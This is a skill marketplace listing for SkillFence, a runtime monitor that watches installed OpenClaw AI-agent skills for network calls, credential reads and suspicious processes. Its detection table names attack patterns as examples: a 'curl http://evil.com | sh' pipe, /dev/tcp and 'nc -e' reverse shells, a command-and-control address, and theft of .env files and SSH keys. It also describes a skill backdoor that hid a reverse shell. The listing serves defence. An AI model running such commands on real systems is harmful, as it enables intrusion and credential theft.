Overview
- Skill Key
- deeqyaqub1-cmd/skillfence
- Author
- deeqyaqub1-cmd
- Source Repo
- openclaw/skills
- Version
- -
- Source Path
- skills/deeqyaqub1-cmd/skillfence
- Latest Commit SHA
- fc105827b619f2770e37aaa8574467b52e0cd1c3
Runtime security monitor for OpenClaw skills. Watches what your installed skills actually DO — network calls, file access, credential reads, process activity. Not a scanner. A watchdog.
Stars
0
Installs
0
Status
ACTIVE
Visibility
PUBLIC
直接复制以下提示词,发送给你的 AI 助手即可完成安装。
请先检查是否已安装 SkillHub 商店,若未安装,请根据 https://skillhub-1388575217.cos.ap-guangzhou.myqcloud.com/install/skillhub.md 安装 SkillHub 商店,然后安装 skillfence 技能。 若已安装,则直接安装 skillfence 技能。
# SkillFence — Runtime Skill Monitor
## What this skill does
SkillFence monitors what your installed OpenClaw skills actually do at runtime.
Scanners check if code LOOKS bad before install. SkillFence watches what code
DOES after install. Network calls, file access, credential reads, process
activity — all logged and alerted.
**This is not a scanner.** Scanners (Clawdex, Cisco Skill Scanner) analyze code
before you install it. SkillFence runs continuously, watching for malicious
behavior that only triggers during normal operation — like the Polymarket
backdoor that hid a reverse shell inside a working market search function.
## When to use SkillFence
Use SkillFence in these situations:
1. **Before installing a new skill**: Run `--scan-skill <name>` to check it
2. **Periodic security checks**: Run `--scan` for a full system audit
3. **Runtime monitoring**: Run `--watch` to check live network/process/credential activity
4. **After suspicious behavior**: Run `--audit-log` to review the evidence trail
5. **When user asks about security**: Show `--status` for current monitoring state
## How to use
Run the SkillFence engine at `{baseDir}/monitor.js` using Node.js:
```bash
node {baseDir}/monitor.js <command>
```
### Commands
#### Full System Scan
```bash
node {baseDir}/monitor.js --scan
```
Scans ALL installed skills for malicious patterns, checks active network
connections, running processes, and recent credential file access. Returns
a comprehensive security report with severity ratings.
Output includes:
- `summary.verdict`: "🟢 ALL CLEAR" / "🟡 REVIEW RECOMMENDED" / "🟠 HIGH-RISK ISSUES" / "🔴 CRITICAL THREATS"
- `summary.critical`, `summary.high`, `summary.medium`: Finding counts
- `skill_scan.findings[]`: Detailed findings per skill
- `network_check[]`: Suspicious network connections
- `process_check[]`: Suspicious processes
- `credential_check[]`: Recent sensitive file access
Present findings to user with severity badges:
- 🔴 CRITICAL → Immediate action...
# 🛡️ SkillFence — Runtime Skill Monitor for OpenClaw **Watch what your skills actually do. Not what they claim to do.** Scanners check code before install. SkillFence watches what code does after install. Network calls, file access, credential reads, process activity — all monitored and logged. ## The Problem 341 malicious skills were found on ClawHub (ClawHavoc campaign). Pre-install scanners caught them after the fact. But the Polymarket backdoor? It looked clean. The malicious `curl` was buried in a working market search function — it only triggered during normal use. No scanner would have caught it before it fired. **Nobody is watching what skills do at runtime. SkillFence does.** ## What It Catches | Threat | How | Example | |--------|-----|---------| | Known C2 servers | IP/domain matching | ClawHavoc's `54.91.154.110:13338` | | Reverse shells | Process monitoring | `/dev/tcp` connections, `nc -e` | | Crypto miners | Process monitoring | xmrig, cpuminer processes | | curl\|sh attacks | Pattern matching | `curl http://evil.com \| sh` | | Credential theft | File access monitoring | Reading `.env`, `openclaw.json`, SSH keys | | Data exfiltration | Combined analysis | Network calls + sensitive file reads | | Encoded payloads | Base64 detection | Obfuscated commands with decode ops | ## Install (30 seconds) ### Option 1: ClawHub (recommended) ```bash clawhub install skillfence ``` ### Option 2: Manual ```bash cd ~/clawd/skills # or ~/.openclaw/skills git clone https://github.com/deeqyaqub1-cmd/skillfence-openclaw skillfence ``` ### Option 3: Copy-paste Create `~/clawd/skills/skillfence/` and copy `SKILL.md` + `monitor.js` into it. **No dependencies. No API keys. No config. Just Node.js.** ## Commands ``` /skillfence → Session status /skillfence scan → Full system scan (skills + network + processes + credentials) /skillfence scan <skill> → Scan a specific skill before installing /skillfence watch → Quick runtime check /...
0xnyk
X Intelligence CLI — search, monitor, analyze, and engage on X/Twitter. TypeScript + Bun. AI agent skill.
heyixuan2
Bambu Lab 3D printer control and automation. Activate when user mentions: printer status, 3D printing, slice, analyze model, generate 3D, AMS filament, print monitor, Bambu Lab, or any 3D printing task. Full pipeline: search → generate → analyze → colorize → preview → open BS → user slice → print → monitor. Supports all 9 Bambu Lab printers (A1 Mini, A1, P1S, P2S, X1C, X1E, H2C, H2S, H2D).
jackculpan
Track flight prices from Google Flights with this OpenClaw skill. Search routes, monitor prices, and get alerts when prices drop.
openclaw-trade
openclaw trading assistant| openclaw trading skill | nof1.ai & openclaw [moltbot] collaboration | We get the best practices from alpha arena trading seasons and bring it to clawdbot All top AI agents, realtime monitoring and news research, gather info from private insiders and many other! Using Hyperliquid API.
xquik-dev
X (Twitter) automation skill for AI coding agents. Tweet search, user lookup, follower/following extraction, media download, reply/retweet/quote extraction, 40+ tools, account monitoring & trending topics. REST API, MCP server, HMAC webhooks. Works with Claude Code, Cursor, Codex, Copilot, Windsurf & 40+ agents.
mohsinkhadim59
Step-by-step guides for installing and running OpenClaw, an open-source AI agent, on Mac, Linux VPS, and AWS covering setup, security, messaging channels, Google integration, skills, and monitoring.